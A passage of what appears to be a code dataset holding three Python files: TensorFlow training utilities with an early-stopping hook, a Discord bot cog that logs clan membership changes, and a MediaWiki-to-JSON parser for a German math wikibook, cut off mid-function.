tf.parse_single_example(example_proto, features)\n\n # Scale solutions back to [-1,1] range (approximately)\n SOLN_SCALING = 100.0\n\n mesh = tf.decode_raw(parsed_features[\"mesh\"], tf.uint8)\n mesh = tf.cast(tf.reshape(mesh, [res, res, 1]), tf.float32)\n\n data = parsed_features[\"data\"]\n coeff = parsed_features[\"coeff\"]\n soln = tf.multiply(parsed_features[\"soln\"], SOLN_SCALING)\n\n # Apply transformation for data augmentation\n \"\"\"\n if transformation is not None:\n [rotation, flip] = transformation\n \n # Stacked data\n stacked = tf.stack([data, coeff, mesh, soln], 0)\n\n # Rotate data\n stacked = tf.image.rot90(stacked, k=rotation)\n\n # Flip data\n if flip == 1:\n stacked = tf.image.flip_left_right(stacked)\n true_fn = lambda: tf.image.flip_left_right(stacked)\n false_fn = lambda: stacked\n stacked = tf.cond(tf.math.equal(flip, 1), true_fn, false_fn)\n\n # Unstack data\n data, coeff, mesh, soln = tf.unstack(stacked)\n \"\"\" \n return data, coeff, mesh, soln\n\n\n\n# Show all variables in current model\ndef show_variables():\n model_vars = tf.trainable_variables()\n slim.model_analyzer.analyze_vars(model_vars, print_info=True)\n \n# Create folders if they do not already exist\ndef checkFolders(dir_list):\n for dir in list(dir_list):\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n# Check that fulle MNIST dataset exists in specified directory\ndef checkData(data_dir):\n if not os.path.exists(data_dir):\n raise FileNotFoundError(\"Specified data directory '\" + data_dir + \"' does not exist in filesystem.\")\n elif not os.path.exists(os.path.join(data_dir,'Data')):\n raise FileNotFoundError(\"'Data' not found in data directory.\")\n elif not os.path.exists(os.path.join(data_dir,'Meshes')):\n raise FileNotFoundError(\"'Meshes' not found in data directory.\")\n elif not os.path.exists(os.path.join(data_dir,'Solutions')):\n raise FileNotFoundError(\"'Solutions' not found in data directory.\")\n\n# Copy model and flags files for logging\ndef backup_configs(model_dir):\n checkFolders([model_dir])\n for f in [\"main.py\", \"base_model.py\", \"utils.py\", \"flags.py\", \"convolution_layers.py\"]:\n copyfile(f, os.path.join(model_dir, f))\n if not os.path.exists(os.path.join(model_dir,\"Networks\")):\n copytree(\"Networks\", os.path.join(model_dir,\"Networks\"))\n\n\n# Add suffix to end of tensor name\ndef add_suffix(name, suffix):\n if suffix is not None:\n return name + suffix\n else:\n return name\n\n\n\n\n\n# Define early stopping hook\nclass EarlyStoppingHook(session_run_hook.SessionRunHook):\n def __init__(self, loss_name, feed_dict={}, tolerance=0.01, stopping_step=50, start_step=100):\n self.loss_name = loss_name\n self.feed_dict = feed_dict\n self.tolerance = tolerance\n self.stopping_step = stopping_step\n self.start_step = start_step\n\n # Initialize global and internal step counts\n def begin(self):\n self._global_step_tensor = training_util._get_or_create_global_step_read()\n if self._global_step_tensor is None:\n raise RuntimeError(\"Global step should be created to use EarlyStoppingHook.\")\n self._prev_step = -1\n self._step = 0\n\n # Evaluate early stopping loss every 1000 steps\n # (avoiding repetition when multiple run calls are made each step)\n def before_run(self, run_context):\n if (self._step % self.stopping_step == 0) and \\\n (not self._step == self._prev_step) and (self._step > self.start_step):\n\n print(\"\\n[ Early Stopping Check ]\")\n \n # Get graph from run_context session\n graph = run_context.session.graph\n\n # Retrieve loss tensor from graph\n loss_tensor = graph.get_tensor_by_name(self.loss_name)\n\n # Populate feed dictionary with placeholders and values\n fd = {}\n for key, value in self.feed_dict.items():\n placeholder = graph.get_tensor_by_name(key)\n fd[placeholder] = value\n\n return session_run_hook.SessionRunArgs({'step': self._global_step_tensor,\n 'loss': loss_tensor}, feed_dict=fd)\n else:\n return session_run_hook.SessionRunArgs({'step': self._global_step_tensor})\n \n # Check if current loss is below tolerance for early stopping\n def after_run(self, run_context, run_values):\n if (self._step % self.stopping_step == 0) and \\\n (not self._step == self._prev_step) and (self._step > self.start_step):\n global_step = run_values.results['step']\n current_loss = run_values.results['loss']\n print(\"Current stopping loss = %.10f\\n\" %(current_loss))\n \n if current_loss < self.tolerance:\n print(\"[ Early Stopping Criterion Satisfied ]\\n\")\n run_context.request_stop()\n self._prev_step = global_step \n else:\n global_step = run_values.results['step']\n self._step = global_step\n\n","sub_path":"Variable_Coefficient/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"232277758","text":"import logging\r\nfrom typing import Optional\r\n\r\nimport discord\r\nfrom redbot.core.bot import Red\r\nfrom redbot.core import Config, checks, commands\r\n\r\nlog = logging.getLogger(\"red.cogs.clanlog\")\r\n\r\n\r\nclass NoClansCog(Exception):\r\n pass\r\n\r\n\r\nclass ClanLog(commands.Cog):\r\n def __init__(self, bot: Red):\r\n self.bot = bot\r\n\r\n self.config = Config.get_conf(self, identifier=6942053)\r\n default_global = {\r\n \"global_log_channel\": None,\r\n }\r\n self.config.register_global(**default_global)\r\n\r\n try:\r\n # for auto-completion :)\r\n from clashroyaleclansv2 import ClashRoyaleClans2\r\n self.crclans: ClashRoyaleClans2 = self.bot.get_cog(\"ClashRoyaleClans2\")\r\n if self.crclans is None:\r\n log.error(\"Load clashroyaleclans cog for this cog to work.\")\r\n raise NoClansCog\r\n except:\r\n pass\r\n\r\n @commands.Cog.listener(name=\"on_clandata_update\")\r\n async def on_clandata_update(self, old_data, new_data):\r\n def get_role_hierarchy(role):\r\n hierarchy = {\"member\": 1, \"elder\": 2, \"coleader\": 3, \"leader\": 4}\r\n if role.lower() not in hierarchy.keys():\r\n log.error(f\"Cannot find hierarchy for role {role.lower() or 'None'}\")\r\n return 0\r\n return hierarchy[role.lower()]\r\n\r\n log_channel_id = await self.config.global_log_channel()\r\n log_channel = self.bot.get_channel(log_channel_id)\r\n if log_channel is None:\r\n log.error(\"Global log channel is not setup correctly.\")\r\n return\r\n\r\n # old_data = kwargs.get(\"old_data\")\r\n # new_data = kwargs.get(\"new_data\")\r\n if len(old_data) == 0 or old_data is None:\r\n log.error(\"Old data is \" + old_data)\r\n return\r\n if len(new_data) == 0 or new_data is None:\r\n log.error(\"New data is \" + new_data)\r\n return\r\n for key, data in new_data.items():\r\n clan_log_channel = self.crclans.get_static_clandata(key).get(\"log_channel\", None)\r\n if clan_log_channel:\r\n clan_log_channel = self.bot.get_channel(clan_log_channel)\r\n\r\n old_members_data = {}\r\n new_members_data = {}\r\n # When a clan is added\r\n if key not in old_data.keys():\r\n log.error(f\"Clan {key} not found in old_data.\")\r\n continue\r\n for member_data in old_data[key][\"member_list\"]:\r\n old_members_data[member_data[\"tag\"]] = member_data\r\n for member_data in data[\"member_list\"]:\r\n new_members_data[member_data[\"tag\"]] = member_data\r\n\r\n # Process promotions and demotions\r\n common_members = set(old_members_data.keys()).intersection(new_members_data.keys())\r\n description = \"\"\r\n for member in common_members:\r\n old_role = old_members_data[member].get(\"role\", \"\")\r\n old_role_index = get_role_hierarchy(old_role)\r\n new_role = new_members_data[member].get(\"role\", \"\")\r\n new_role_index = get_role_hierarchy(new_role)\r\n if old_role_index == new_role_index:\r\n continue\r\n if old_role_index > new_role_index:\r\n description += f\"Demotion: {old_role} ⇒ {new_role}\\n\"\r\n if old_role_index < new_role_index:\r\n description += f\"Promotion: {old_role} ⇒ {new_role}\\n\"\r\n description += f\"{old_members_data[member]['name']} ({old_members_data[member]['tag']})\\n\"\r\n if description:\r\n embed = discord.Embed(\r\n title=\"Member Edited {data['name']} ({data['tag']})\",\r\n description=description,\r\n colour=discord.Colour.blue(),\r\n )\r\n await log_channel.send(embed=embed)\r\n if clan_log_channel:\r\n await clan_log_channel.send(embed=embed)\r\n\r\n # Process members data\r\n total = set(list(new_members_data.keys())).union(\r\n set(list(old_members_data.keys()))\r\n )\r\n players_left_clan = set(total - set(new_members_data.keys()))\r\n players_joined_clan = set(total - set(old_members_data.keys()))\r\n\r\n description = \"\"\r\n for player_tag in players_left_clan:\r\n player_name = old_members_data.get(player_tag, {}).get(\"name\", \"Unnamed Player\")\r\n sad_emote = self.bot.get_emoji(592001717311242241) or \"\"\r\n description += \"{}({}) has left {} {}\\n\".format(\r\n player_name, player_tag, data[\"name\"], sad_emote\r\n )\r\n if description:\r\n embed = discord.Embed(\r\n title=\"Member Left\",\r\n description=description,\r\n colour=discord.Colour.blue(),\r\n )\r\n await log_channel.send(embed=embed)\r\n if clan_log_channel:\r\n await clan_log_channel.send(embed=embed)\r\n description = \"\"\r\n for player_tag in players_joined_clan:\r\n player_name = new_members_data.get(player_tag, {}).get(\"name\", \"Unnamed Player\")\r\n happy_emote = self.bot.get_emoji(375143193630605332) or \"\"\r\n description += \"{}({}) has joined {} {}\\n\".format(\r\n player_name, player_tag, key, happy_emote\r\n )\r\n if description:\r\n embed = discord.Embed(\r\n title=\"Member Joined\",\r\n description=description,\r\n colour=discord.Colour.blue(),\r\n )\r\n await log_channel.send(embed=embed)\r\n if clan_log_channel:\r\n await clan_log_channel.send(embed=embed)\r\n\r\n @commands.group(name=\"clanlogset\")\r\n async def clanlogset(self, ctx):\r\n pass\r\n\r\n @clanlogset.command(name=\"global_log\")\r\n @checks.is_owner()\r\n async def clanlogset_global_log_channel(self, ctx, channel: Optional[discord.TextChannel] = None):\r\n if channel is None:\r\n await self.config.global_log_channel.set(channel)\r\n await ctx.send(\"Disabled global clanlog\")\r\n await ctx.tick()\r\n return\r\n await self.config.global_log_channel.set(channel.id)\r\n await ctx.send(\"Global clanlog channel has been set to {}\".format(channel.mention))\r\n await ctx.tick()\r\n","sub_path":"clanlog/clanlog.py","file_name":"clanlog.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139518643","text":"\"\"\"Module defining a parser for MediaWiki code.\"\"\"\n\nimport json\nimport re\nimport logging\n\nfrom collections import defaultdict\nfrom itertools import chain, count\nfrom html.parser import HTMLParser\nfrom mfnf.transformations import NodeTransformation, ChainedAction, Action, \\\n NodeTypeTransformation, check, NotInterested, Transformation, SectionTracking\nfrom mfnf.utils import lookup, remove_prefix, remove_suffix, merge, log_parser_error, resolve_usernames\n\nreport_logger = logging.getLogger(\"report_logger\")\n\nTEMPLATE_SPEC = {\n \"definition\": lambda x: x in [\"definition\"],\n \"beispiel\": lambda x: x in [\"beispiel\"],\n \"beweis\": lambda x: x in [\"beweis\"],\n \"alternativer beweis\": lambda x: x in [\"beweis\"],\n \"beweiszusammenfassung\": lambda x: x in [\"zusammenfassung\"],\n \"lösungsweg\": lambda x: x in [\"lösungsweg\"],\n \"lösung\": lambda x: x in [\"lösung\"],\n \"beweisschritt\": lambda x: x in [\"beweisschritt\"],\n \"warnung\": lambda x: x in [\"1\"],\n \"hinweis\": lambda x: x in [\"1\"],\n \"hauptartikel\": lambda x: x in [\"1\"],\n \"frage\": lambda x: x in [\"frage\", \"antwort\"],\n \"aufgabe\": lambda x: x in [\"aufgabe\", \"erklärung\", \"beispiel\",\n \"zusammenfassung\", \"lösung\", \"lösungsweg\",\n \"beweis\", \"beweis2\"],\n \"satz\": lambda x: x in [\"satz\", \"erklärung\", \"beispiel\",\n \"zusammenfassung\", \"lösung\", \"lösungsweg\",\n \"beweis\", \"beweis2\"],\n \"liste\": lambda x: x.startswith(\"item\") or x in [\"liste\"],\n # important paragraph\n \"-\": lambda x: x in [\"1\"],\n \"fallunterscheidung\": lambda x: x.startswith(\"beweis\"),\n \"vollständige induktion\": lambda x: x in [\"aussageform\", \"induktionsanfang\",\n \"induktionsvoraussetzung\", \"induktionsbehauptung\",\n \"beweis_induktionsschritt\", \"erfuellungsmenge\"],\n}\n\nTEMPLATE_INLINE_SPEC = {\n \"beweisschritt\": lambda x: x in [\"ziel\", \"name\"],\n \"fallunterscheidung\": lambda x: x.startswith(\"fall\"),\n \"formel\": lambda x: x in [\"1\"],\n \"definition\": lambda x: x in [\"titel\"],\n \"beispiel\": lambda x: x in [\"titel\"],\n \"lösungsweg\": lambda x: x in [\"titel\"],\n \"lösung\": lambda x: x in [\"titel\"],\n \"beweiszusammenfassung\": lambda x: x in [\"titel\"],\n \"alternativer beweis\": lambda x: x in [\"titel\"],\n \"beweis\": lambda x: x in [\"titel\"],\n \"satz\": lambda x: x in [\"titel\"],\n \"aufgabe\": lambda x: x in [\"titel\"],\n \"fg\": lambda x: x in [\"2\"]\n}\n\nTEMPLATE_LIST_PARAMS = {\n \"liste\": [\"item\"],\n \"fallunterscheidung\": [\"fall\", \"beweis\"]\n}\n\nBOXSPEC = [\n (\"definition\", \"definition\",\n {\"title\": \"titel\", \"definition\": \"definition\"}),\n\n (\"example\", \"beispiel\", {\"title\": \"titel\", \"example\": \"beispiel\"}),\n\n (\"solution\", \"lösung\", {\"title\": \"titel\", \"solution\": \"lösung\"}),\n\n (\"proofbycases\", \"fallunterscheidung\",\n {\"cases\": \"fall_list\", \"proofs\": \"beweis_list\"}),\n\n (\"solutionprocess\", \"lösungsweg\",\n {\"title\": \"titel\", \"solutionprocess\": \"lösungsweg\"}),\n\n (\"proofsummary\", \"beweiszusammenfassung\",\n {\"title\": \"titel\", \"proofsummary\": \"zusammenfassung\"}),\n\n (\"alternativeproof\", \"alternativer beweis\",\n {\"title\": \"titel\", \"alternativeproof\": \"beweis\"}),\n\n (\"proof\", \"beweis\", {\"title\": \"titel\", \"proof\": \"beweis\"}),\n\n (\"warning\", \"warnung\", {\"warning\": \"1\"}),\n\n (\"hint\", \"hinweis\", {\"hint\": \"1\"}),\n\n (\"coloredtext\", \"fg\", {\"color\": \"1\", \"content\": \"2\"}),\n\n (\"smiley\", \"smiley\", {\"name\": \"1\"}),\n\n (\"mainarticle\", \"hauptartikel\", {\"mainarticle\": \"1\"}),\n\n (\"question\", \"frage\",\n {\"question\": \"frage\", \"answer\": \"antwort\", \"questiontype\": \"typ\"}),\n\n (\"proofstep\", \"beweisschritt\",\n {\"name\": \"name\", \"target\": \"ziel\", \"proof\": \"beweisschritt\"}),\n\n (\"theorem\", \"satz\",\n {\"title\": \"titel\", \"theorem\": \"satz\", \"explanation\": \"erklärung\",\n \"example\": \"beispiel\", \"proofsummary\": \"zusammenfassung\",\n \"solution\": \"lösung\", \"solutionprocess\": \"lösungsweg\",\n \"proof\": \"beweis\", \"alternativeproof\": \"beweis2\"}),\n\n (\"exercise\", \"aufgabe\",\n {\"title\": \"titel\", \"exercise\": \"aufgabe\", \"explanation\": \"erklärung\",\n \"example\": \"beispiel\", \"proofsummary\": \"zusammenfassung\",\n \"solution\": \"lösung\", \"solutionprocess\": \"lösungsweg\",\n \"proof\": \"beweis\", \"alternativeproof\": \"beweis2\"}),\n\n (\"importantparagraph\", \"-\", {\"importantparagraph\": \"1\"}),\n (\"induction\", \"vollständige induktion\", {\"statement\": \"aussageform\", \"induction_start\": \"induktionsanfang\",\n \"induction_requirement\": \"induktionsvoraussetzung\", \"induction_goal\": \"induktionsbehauptung\",\n \"induction_step\": \"beweis_induktionsschritt\", \"baseset\": \"erfuellungsmenge\"})\n]\n\nDEFAULT_VALUES = {\n \"proofstep\": {\n \"name\": [{\"type\": \"text\", \"data\": \"Beweisschritt\"}]\n },\n \"smiley\": {\n \"name\": \":)\"\n }\n}\n\n\n# List of all HTML inline elements\n# see https://developer.mozilla.org/en-US/docs/Web/HTML/Inline_elements\nHTML_INLINE_ELEMENTS = [\n \"a\", \"b\", \"big\", \"i\", \"small\", \"tt\", \"abbr\", \"acronym\", \"cite\", \"code\",\n \"dfn\", \"em\", \"kbd\", \"strong\", \"samp\", \"time\", \"var\", \"bdo\", \"br\", \"img\",\n \"map\", \"object\", \"q\", \"script\", \"span\", \"sub\", \"sup\", \"button\", \"input\",\n \"label\", \"select\", \"textarea\"\n]\n\ndef canonical_image_name(name):\n name = remove_prefix(name, \"./\")\n name = remove_prefix(name, \"Datei:\")\n name = remove_prefix(name, \"File:\")\n\n return \"File:\" + name\n\ndef parse_content(api, title, text):\n \"\"\"Parse MediaWiki code `text`.\"\"\"\n return MediaWikiCodeParser(api=api, title=title)(text)\n\ndef parse_inline(api, title, text):\n \"\"\"Parse MediaWiki code `text` in inline mode.\"\"\"\n content = MediaWikiCodeParser(api=api, title=title)(text)\n\n assert len(content) == 1, text\n assert content[0][\"type\"] == \"element\", \"{} in {} yields {}\".format(text, title, content)\n assert content[0][\"name\"] == \"p\", \"{} in {} yields {}\".format(text, title, content)\n\n return content[0][\"children\"]\n\ndef text_rstrip(content):\n \"\"\"Applies `rstrip()` to parsed MediaWiki content.\"\"\"\n try:\n return content[:-1] + [{\"type\": \"text\",\n \"data\": content[-1][\"data\"].rstrip()}]\n except (IndexError, KeyError):\n return content\n\nclass HTML2JSONParser(HTMLParser):\n \"\"\"Parser for converting HTML to JSON.\"\"\"\n\n def __init__(self):\n super(HTML2JSONParser, self).__init__()\n\n self._node_stack = []\n self.content = []\n\n def _append(self, node):\n if self._node_stack:\n self._node_stack[-1][\"children\"].append(node)\n else:\n self.content.append(node)\n\n def handle_starttag(self, tag, attrs):\n node = {\"type\": \"element\", \"name\": tag,\n \"attrs\": dict(attrs),\n \"children\": []}\n\n self._append(node)\n self._node_stack.append(node)\n\n def handle_endtag(self, tag):\n assert self._node_stack\n assert self._node_stack[-1][\"name\"] == tag, \\\n \"end tag should be {}, but is {}. last nodes: {}\" \\\n .format(tag, self._node_stack[-1][\"name\"], self._node_stack)\n\n self._node_stack.pop()\n\n def handle_data(self, data):\n self._append({\"type\": \"text\", \"data\": data})\n\n def error(self, message):\n raise AssertionError(message)\n\nclass MediaWikiCodeParser(ChainedAction):\n \"\"\"Parses MediaWikiCode and restore template definitions.\"\"\"\n\n class MediaWikiCode2HTML(Action):\n \"\"\"Converts MediaWiki code to HTML\"\"\"\n\n def __call__(self, text):\n return self.api.convert_text_to_html(self.title, text)\n\n class MediaWikiCodeHTML2JSON(Action):\n \"\"\"Converts HTML of a MediaWiki document to JSON.\"\"\"\n\n def __call__(self, text):\n parser = HTML2JSONParser()\n\n parser.feed(text)\n\n return parser.content\n\n class RemoveUnicodeFallback(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\").of((\"span\", ))\n check(obj, \"attrs\", \"typeof\") == \"mw:FallbackId\"\n return None\n\n class CollapseWhitespaces(Transformation):\n def change_inline(self, obj, i, n):\n if lookup(obj, \"type\") == \"text\":\n data = re.sub(r\"\\s+(?=\\s)\", \"\", obj[\"data\"])\n data = re.sub(r\"\\s\", \" \", data)\n if \"\\n\" in data:\n print(repr(data))\n\n if i == 0:\n data = data.lstrip()\n\n if i == n-1:\n data = data.rstrip()\n\n if data:\n return merge(obj, {\"data\": data})\n else:\n return None\n else:\n return self(obj)\n\n def change_block(self, obj, i, n):\n result = self.change_inline(obj, i, n)\n\n if lookup(result, \"data\") == \" \":\n return None\n else:\n return result\n\n def act_on_list(self, lst):\n if any((lookup(x, \"name\") in HTML_INLINE_ELEMENTS for x in lst)):\n func = self.change_inline\n else:\n func = self.change_block\n\n # Necessary because the header includes a because of\n # calling {{DISPLAYTITLE:...}} which should not happen. This\n # triggers that the root content is handled as inline mode which\n # should not happen.\n # TODO: Find a better solution\n if any((lookup(x, \"name\") == \"p\" for x in lst)):\n func = self.change_block\n\n result = (func(x, i, len(lst)) for x, i in zip(lst, count()))\n result = [x for x in result if x is not None]\n\n return result\n\n class TemplateDeinclusion(NodeTypeTransformation):\n \"\"\"Replaces included MediaWiki templates with template\n specification.\"\"\"\n\n def __init__(self, **options):\n super().__init__(**options)\n\n self._template_ids = set()\n\n def parse_parameter_value(self, name, param_key, param_value):\n \"\"\"Parses `param_value` in case `param_key` is a content\n parameter.\"\"\"\n\n if not param_value:\n # Empty strings shall be interpreted as None\n return None\n elif name in TEMPLATE_SPEC and TEMPLATE_SPEC[name](param_key):\n return parse_content(self.api, self.title, param_value)\n elif name in TEMPLATE_INLINE_SPEC \\\n and TEMPLATE_INLINE_SPEC[name](param_key):\n return parse_inline(self.api, self.title, param_value)\n else:\n return param_value\n\n def transform_element(self, obj):\n if lookup(obj, \"attrs\", \"about\") in self._template_ids:\n return None\n\n check(obj, \"attrs\", \"typeof\").of([\"mw:Transclusion\",\n \"mw:Transclusion mw:Video/Thumb\",\n \"mw:Transclusion mw:Image\"])\n\n template = json.loads(obj[\"attrs\"][\"data-mw\"])[\"parts\"][0]\n\n try:\n template = template[\"template\"]\n except (TypeError, KeyError):\n return {\"type\": \"error\",\n \"message\": \"Template spans over several HTML elements.\"}\n\n name = template[\"target\"][\"wt\"].strip()\n\n # labeled section transclusion needs unchanged case.\n if not name.startswith(\"#lst:\"):\n name = name.lower()\n\n if name != \"(!\":\n # Template includes a table afterwards\n self._template_ids.add(obj[\"attrs\"][\"about\"])\n\n name = remove_prefix(name, \":mathe für nicht-freaks: vorlage:\")\n\n params = template[\"params\"]\n params = {k: v[\"wt\"] for k, v in params.items()}\n params = {key: self.parse_parameter_value(name, key, value) \\\n for key, value in params.items()\n if not params.get(key + \"-noprint\", False)}\n\n # TODO: Find better solution\n if params.get(\"noprint\", False):\n return None\n\n return {\"type\": \"template\", \"name\": name, \"params\": params}\n\n class HandleLabeledTranscludedSections(NodeTypeTransformation):\n def transform_template(self, obj):\n if obj[\"name\"].startswith(\"#lst:\"):\n article_name = remove_prefix(obj[\"name\"], \"#lst:\")\n article = self.api.get_content(article_name)\n\n section_name = obj[\"params\"][\"1\"]\n begin = r\"\\\"\n end = r\"\\\"\n\n section = re.search(begin + \"(.*)\" + end, article, re.DOTALL)\n\n if section:\n section = section.group(1).strip()\n content = parse_content(self.api, self.title, section)\n\n return {\"type\": \"included_section\", \"content\": content}\n else:\n message = \"section '{}' of '{}' cannot be included\" \\\n .format(section_name, article_name)\n\n return {\"type\": \"error\", \"message\": message}\n else:\n raise NotInterested()\n\n class HandleGalleries(SectionTracking):\n def parse_gallery_item(self, text):\n try:\n name, caption = text.split(\"|\", 1)\n except ValueError:\n message = \"Gallery item needs a caption\"\n log_parser_error(message, text, position=self.current_section)\n return {\"type\": \"error\",\n \"message\": message}\n\n caption = parse_inline(self.api, self.title, caption.strip())\n license = self.api.get_image_license(name)\n\n return {\"type\": \"galleryitem\", \"caption\": caption,\n \"name\": canonical_image_name(name), \"license\": license}\n\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\") == \"ul\"\n check(obj, \"attrs\", \"typeof\") == \"mw:Extension/gallery\"\n\n data_mw = json.loads(obj[\"attrs\"][\"data-mw\"])\n spec = data_mw[\"body\"][\"extsrc\"].strip()\n items = [self.parse_gallery_item(x) for x in spec.splitlines()]\n\n return {\"type\": \"gallery\",\n \"widths\": int(data_mw[\"attrs\"].get(\"widths\", 120)),\n \"heights\": int(data_mw[\"attrs\"].get(\"heights\", 120)),\n \"items\": items}\n\nclass ArticleContentParser(ChainedAction):\n class MediaWikiCode2HTML(Action):\n def __call__(self, text):\n return parse_content(self.api, self.title, text)\n\n class MergeListParametersInTemplates(NodeTypeTransformation):\n def transform_template(self, obj):\n if obj[\"name\"] in TEMPLATE_LIST_PARAMS:\n params = obj[\"params\"].copy()\n\n for param_prefix in TEMPLATE_LIST_PARAMS[obj[\"name\"]]:\n result = []\n\n for n in count(1):\n try:\n result.append(params.pop(param_prefix + str(n)))\n except KeyError:\n break\n\n params[param_prefix + \"_list\"] = result\n\n return merge(obj, {\"params\": params})\n else:\n raise NotInterested()\n\n class RemoveReferences(NodeTypeTransformation):\n # TODO: We need a better implementation\n def transform_element(self, obj):\n if lookup(obj, \"attrs\", \"typeof\") in (\"mw:Extension/ref\",\n \"mw:Extension/references\"):\n # TODO: Proper parsing of references\n return None\n else:\n raise NotInterested()\n\n class HandleLists(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\").of((\"ul\", \"ol\"))\n\n items = [{\"type\": \"listitem\",\n \"content\": self(li[\"children\"])}\n for li in obj[\"children\"]]\n\n return {\"type\": \"list\",\n \"ordered\": obj[\"name\"] == \"ol\",\n \"items\": items}\n\n class HandleDefinitionLists(SectionTracking):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\") == \"dl\"\n\n items = [{\"type\": \"definitionlistitem\",\n \"definition\": self(dt[\"children\"]),\n \"explanation\": self(dd[\"children\"])}\n for dt, dd in zip(obj[\"children\"][::2],\n obj[\"children\"][1::2])]\n\n if not items:\n message = \"A definition list must not be empty!\"\n log_parser_error(message, obj, position=self.current_section)\n return {\"type\": \"error\",\n \"message\": message}\n\n return {\"type\": \"definitionlist\",\n \"items\": items}\n\n class HandleFigures(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\").of((\"figure\", \"span\", \"figure-inline\"))\n check(obj, \"attrs\", \"typeof\").of((\"mw:Image\", \"mw:Image/Thumb\"))\n\n caption = [child\n for child in obj[\"children\"]\n if child[\"name\"] == \"figcaption\"]\n try:\n caption = caption[0][\"children\"]\n except IndexError:\n caption = []\n\n img = obj[\"children\"][0][\"children\"][0]\n name = canonical_image_name(img[\"attrs\"][\"resource\"])\n license = self.api.get_image_license(name)\n\n return {\"type\": \"image\", \"caption\": self(caption), \"name\": name,\n \"thumbnail\": obj[\"attrs\"][\"typeof\"] == \"mw:Image/Thumb\",\n \"inline\": obj[\"name\"] in (\"span\", \"figure-inline\"),\n \"license\": license,\n \"noprint\": \"noprint\" in obj[\"attrs\"].get(\"class\", \"\")}\n\n class HandleInlineFigures(SectionTracking):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\") == \"span\"\n check(obj, \"attrs\", \"typeof\") == \"mw:Image\"\n\n message = \"Inline images are not allowed\"\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message}\n\n class HandleTable(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\") == \"table\"\n\n content = obj[\"children\"]\n\n if lookup(content, 0, \"name\") == \"tbody\":\n content = content[0][\"children\"]\n\n return {\"type\": \"table\", \"content\": self(content)}\n\n class ConvertInlineMath(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"attrs\", \"typeof\") == \"mw:Extension/math\"\n\n formula = json.loads(obj[\"attrs\"][\"data-mw\"])[\"body\"][\"extsrc\"]\n\n return {\"type\": \"inlinemath\", \"formula\": formula.strip()}\n\n class FixNodeTypes(NodeTypeTransformation, SectionTracking):\n def transform_element(self, obj):\n if obj[\"name\"] == \"p\":\n return {\"type\": \"paragraph\", \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] == \"br\":\n message = \"
not allowed\"\n log_parser_error(message, obj, position=self.current_section)\n return {\"type\": \"error\", \"message\": message}\n elif obj[\"name\"] == \"dfn\":\n return {\"type\": \"i\", \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] in (\"i\", \"b\", \"th\", \"tr\", \"td\"):\n return {\"type\": obj[\"name\"], \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] in (\"h2\", \"h3\"):\n return {\"type\": \"header\",\n # Header begin with h2 in our project -> subtract 1\n \"depth\": int(obj[\"name\"][-1])-1,\n \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] == \"a\":\n url = obj[\"attrs\"].get(\"href\", \"\")\n\n if url:\n if url.startswith(\"./\"):\n # TODO: The URL prefix should not be hardcoded here\n url = \"https://de.wikibooks.org/wiki/\" + url[2:]\n\n assert url.startswith(\"http://\") \\\n or url.startswith(\"https://\")\n\n return {\"type\": \"href\", \"url\": url,\n \"content\": self(obj[\"children\"])}\n else:\n message = \" tag without `href` url\"\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message}\n elif obj[\"name\"] == \"del\":\n return {\"type\": \"strikethrough\", \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] == \"blockquote\":\n return {\"type\": \"blockquote\", \"content\": self(obj[\"children\"])}\n\n elif lookup(obj, \"attrs\", \"typeof\") == \"mw:Video/Thumb\":\n # TODO: Proper parsing of videos\n return None\n elif lookup(obj, \"attrs\", \"typeof\") == \"mw:Extension/section\":\n data = json.loads(obj[\"attrs\"][\"data-mw\"])\n\n assert data[\"name\"] == \"section\"\n\n if \"begin\" in data[\"attrs\"]:\n return {\"type\": \"section_start\",\n \"name\": data[\"attrs\"][\"begin\"]}\n elif \"end\" in data[\"attrs\"]:\n return {\"type\": \"section_end\",\n \"name\": data[\"attrs\"][\"end\"]}\n else:\n return {\"type\": \"error\",\n \"message\": \"section must be either start or end.\"}\n elif obj[\"name\"] in (\"h1\", \"h4\", \"h5\", \"h6\"):\n message = \"Heading of depth {} is not allowed\".format(obj[\"name\"][1:])\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message.format(int(obj[\"name\"][-1]))}\n elif lookup(obj, \"attrs\", \"typeof\") == \"mw:Entity\":\n # TODO: Are there other entities?\n return {\"type\": \"entity\", \"kind\": \" \"}\n elif (obj[\"name\"] == \"span\" and\n lookup(obj, \"attrs\", \"typeof\") == \"mw:DisplaySpace mw:Placeholder\"):\n msg = \"Spans with type {} are not allowed\".format(lookup(obj,\n \"attrs\",\n \"typeof\"))\n log_parser_error(msg, obj, position=self.current_section)\n return {\"type\": \"error\", \"message\": msg}\n else:\n message = \"Parsing of HTML element `{}`\".format(obj[\"name\"])\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"notimplemented\",\n \"message\": message,\n \"target\": obj}\n\n class HandleHeadingAnchors(NodeTypeTransformation):\n def transform_header(self, obj):\n check(obj, \"content\", -1, \"type\") == \"template\"\n check(obj, \"content\", -1, \"name\") == \"anker\"\n\n heading = text_rstrip(obj[\"content\"][:-1])\n anchor = 